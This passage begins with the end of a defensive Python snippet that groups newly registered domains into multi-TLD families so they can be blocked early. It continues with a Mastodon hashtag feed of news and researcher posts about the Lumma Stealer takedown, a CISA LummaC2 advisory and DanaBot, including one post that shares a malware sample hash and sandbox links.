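    for label, tlds in sorted(families_by_tld(SAMPLE_DOMAINS).items()):
        print(f"{label:<12} {', '.join(tlds)}")
    for tpl, labels in families_by_template(SAMPLE_DOMAINS).items():
        print(f"template {tpl}: {', '.join(labels)}")
```

On the post's own sample all eight labels come back as multi-TLD families while the example.com/example.net controls do not, and the template view pairs bin48 with bin898293. In practice you would feed newly registered domain feeds or passive DNS into `families_by_tld` and block a label across every watched TLD as soon as two registrations appear, which is the "block before activation" effect the post describes.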
ENTER.CO<p><a href="https://mastodon.social/tags/PorSiTeLoPerdiste" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PorSiTeLoPerdiste</span></a> Microsoft discovers malware that infected 394,000 computers worldwide, Colombia among the affected countries <a href="https://www.enter.co/empresas/seguridad/microsoft-descubre-un-malware-que-infecto-394-000-equipos-en-todo-el-planeta-colombia-entre-los-paises-afectados/?utm_source=dlvr.it&amp;utm_medium=mastodon" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">enter.co/empresas/seguridad/mi</span><span class="invisible">crosoft-descubre-un-malware-que-infecto-394-000-equipos-en-todo-el-planeta-colombia-entre-los-paises-afectados/?utm_source=dlvr.it&amp;utm_medium=mastodon</span></a> <a href="https://mastodon.social/tags/Seguridad" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Seguridad</span></a> <a href="https://mastodon.social/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> <a href="https://mastodon.social/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a></p>
Softsasi<p>🚨 Lumma Stealer malware infected 394,000 Windows PCs, potentially stealing passwords! 😱</p><p>🛡️ Protect yourself: Use strong passwords, enable 2FA, and avoid suspicious links.</p><p>🔐 Softsasi offers cybersecurity audits &amp; password management solutions. Stay safe online!<br><a href="https://mastodon.social/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://mastodon.social/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://mastodon.social/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://mastodon.social/tags/Softsasi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Softsasi</span></a></p>
Pyrzout :vm:<p>Response to CISA Advisory (AA25-141B): Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations – Source: securityboulevard.com <a href="https://ciso2ciso.com/response-to-cisa-advisory-aa25-141b-threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations-source-securityboulevard-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/response-to-cisa</span><span class="invisible">-advisory-aa25-141b-threat-actors-deploy-lummac2-malware-to-exfiltrate-sensitive-data-from-organizations-source-securityboulevard-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/SecurityBloggersNetwork" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityBloggersNetwork</span></a> <a href="https://social.skynetcloud.site/tags/adversaryemulation" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>adversaryemulation</span></a> #Broad-BasedAttacks <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/SecurityBoulevard" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityBoulevard</span></a> <a href="https://social.skynetcloud.site/tags/CISAAdvisory" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CISAAdvisory</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a 
href="https://social.skynetcloud.site/tags/LummaC2" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaC2</span></a> <a href="https://social.skynetcloud.site/tags/CISA" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CISA</span></a></p>
Brad<p>2025-05-22 (Thursday): After the recent <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> disruption, I found an active sample today, so how effective was the disruption, really? </p><p>SHA256 hash for the installer EXE for Lumma Stealer: </p><p>8619bea9571a4dcc4b7f4ba494d444b8078d06dea385dc0caa2378e215636a65</p><p>Analysis: </p><p>- <a href="https://tria.ge/250523-afpxxsfm5t" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">tria.ge/250523-afpxxsfm5t</span><span class="invisible"></span></a><br>- <a href="https://app.any.run/tasks/add82eaa-bdb8-43b9-885b-c0a58cc2530c" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/add82eaa-bdb</span><span class="invisible">8-43b9-885b-c0a58cc2530c</span></a></p><p>To be fair, I investigated a campaign that was pushing Lumma Stealer earlier this week, and it had switched to <a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>StealC</span></a> v2 malware earlier today (2025-05-22):</p><p>- <a href="https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-05-22-campaign-switches-from-Lumma-to-StealC-v2.txt" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/PaloAltoNetworks/Un</span><span class="invisible">it42-timely-threat-intel/blob/main/2025-05-22-campaign-switches-from-Lumma-to-StealC-v2.txt</span></a></p><p>So the disruption was at least somewhat effective based on what I'm seeing. I don't have eyes on the criminal underground, though, so I don't know what's happening with Lumma Stealer's customers.</p>
Pyrzout :vm:<p>Oops: DanaBot Malware Devs Infected Their Own PCs <a href="https://krebsonsecurity.com/2025/05/oops-danabot-malware-devs-infected-their-own-pcs/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">krebsonsecurity.com/2025/05/oo</span><span class="invisible">ps-danabot-malware-devs-infected-their-own-pcs/</span></a> <a href="https://social.skynetcloud.site/tags/DefenseCriminalInvestigativeService" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DefenseCriminalInvestigativeService</span></a> <a href="https://social.skynetcloud.site/tags/ArtemAleksandrovichKalinkin" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ArtemAleksandrovichKalinkin</span></a> <a href="https://social.skynetcloud.site/tags/U" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>U</span></a>.S.DepartmentofJustice <a href="https://social.skynetcloud.site/tags/Russia" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Russia</span></a>'sWaronUkraine <a href="https://social.skynetcloud.site/tags/Ne" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Ne</span></a>'er-Do-WellNews <a href="https://social.skynetcloud.site/tags/AleksandrStepanov" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AleksandrStepanov</span></a> <a href="https://social.skynetcloud.site/tags/ALittleSunshine" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ALittleSunshine</span></a> <a href="https://social.skynetcloud.site/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.skynetcloud.site/tags/Flashpoint" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Flashpoint</span></a> <a href="https://social.skynetcloud.site/tags/proofpoint" class="mention hashtag" rel="nofollow noopener" 
target="_blank">#<span>proofpoint</span></a> <a href="https://social.skynetcloud.site/tags/microsoft" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>microsoft</span></a> <a href="https://social.skynetcloud.site/tags/teamcyrmu" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>teamcyrmu</span></a> <a href="https://social.skynetcloud.site/tags/Intel471" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Intel471</span></a> <a href="https://social.skynetcloud.site/tags/Maffiozi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Maffiozi</span></a> <a href="https://social.skynetcloud.site/tags/DanaBot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DanaBot</span></a> <a href="https://social.skynetcloud.site/tags/JimmBee" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>JimmBee</span></a> <a href="https://social.skynetcloud.site/tags/Zscaler" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Zscaler</span></a> <a href="https://social.skynetcloud.site/tags/google" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>google</span></a> <a href="https://social.skynetcloud.site/tags/Paypal" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Paypal</span></a> <a href="https://social.skynetcloud.site/tags/Lumen" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumen</span></a> <a href="https://social.skynetcloud.site/tags/DCIS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DCIS</span></a> <a href="https://social.skynetcloud.site/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> <a href="https://social.skynetcloud.site/tags/Onix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Onix</span></a> <a href="https://social.skynetcloud.site/tags/fbi" class="mention hashtag" 
rel="nofollow noopener" target="_blank">#<span>fbi</span></a></p>
KrebsOnSecurity RSS<p>Oops: DanaBot Malware Devs Infected Their Own PCs</p><p><a href="https://krebsonsecurity.com/2025/05/oops-danabot-malware-devs-infected-their-own-pcs/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">krebsonsecurity.com/2025/05/oo</span><span class="invisible">ps-danabot-malware-devs-infected-their-own-pcs/</span></a></p><p> <a href="https://burn.capital/tags/DefenseCriminalInvestigativeService" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DefenseCriminalInvestigativeService</span></a> <a href="https://burn.capital/tags/ArtemAleksandrovichKalinkin" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ArtemAleksandrovichKalinkin</span></a> <a href="https://burn.capital/tags/U" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>U</span></a>.S.DepartmentofJustice <a href="https://burn.capital/tags/Russia" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Russia</span></a>'sWaronUkraine <a href="https://burn.capital/tags/Ne" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Ne</span></a>'er-Do-WellNews <a href="https://burn.capital/tags/AleksandrStepanov" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AleksandrStepanov</span></a> <a href="https://burn.capital/tags/ALittleSunshine" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ALittleSunshine</span></a> <a href="https://burn.capital/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://burn.capital/tags/Flashpoint" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Flashpoint</span></a> <a href="https://burn.capital/tags/proofpoint" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>proofpoint</span></a> <a href="https://burn.capital/tags/microsoft" class="mention 
hashtag" rel="nofollow noopener" target="_blank">#<span>microsoft</span></a> <a href="https://burn.capital/tags/teamcyrmu" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>teamcyrmu</span></a> <a href="https://burn.capital/tags/Intel471" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Intel471</span></a> <a href="https://burn.capital/tags/Maffiozi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Maffiozi</span></a> <a href="https://burn.capital/tags/DanaBot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DanaBot</span></a> <a href="https://burn.capital/tags/JimmBee" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>JimmBee</span></a> <a href="https://burn.capital/tags/Zscaler" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Zscaler</span></a> <a href="https://burn.capital/tags/google" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>google</span></a> <a href="https://burn.capital/tags/Paypal" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Paypal</span></a> <a href="https://burn.capital/tags/Lumen" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumen</span></a> <a href="https://burn.capital/tags/DCIS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DCIS</span></a> <a href="https://burn.capital/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> <a href="https://burn.capital/tags/Onix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Onix</span></a> <a href="https://burn.capital/tags/fbi" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>fbi</span></a></p>
The Lebowski<p>Hey Crypto Fam! 🛡️ Microsoft took down Lumma Stealer, a malware stealing crypto &amp; personal data. Over 394,000 PCs infected! Stay safe out there! <a href="https://mastodon.world/tags/CryptoSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CryptoSecurity</span></a> <a href="https://mastodon.world/tags/Cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cybersecurity</span></a> <a href="https://mastodon.world/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a></p>
ENTER.CO<p>Microsoft discovers malware that infected 394,000 computers worldwide, Colombia among the affected countries <a href="https://www.enter.co/empresas/seguridad/microsoft-descubre-un-malware-que-infecto-394-000-equipos-en-todo-el-planeta-colombia-entre-los-paises-afectados/?utm_source=dlvr.it&amp;utm_medium=mastodon" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">enter.co/empresas/seguridad/mi</span><span class="invisible">crosoft-descubre-un-malware-que-infecto-394-000-equipos-en-todo-el-planeta-colombia-entre-los-paises-afectados/?utm_source=dlvr.it&amp;utm_medium=mastodon</span></a> <a href="https://mastodon.social/tags/Seguridad" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Seguridad</span></a> <a href="https://mastodon.social/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> <a href="https://mastodon.social/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a></p>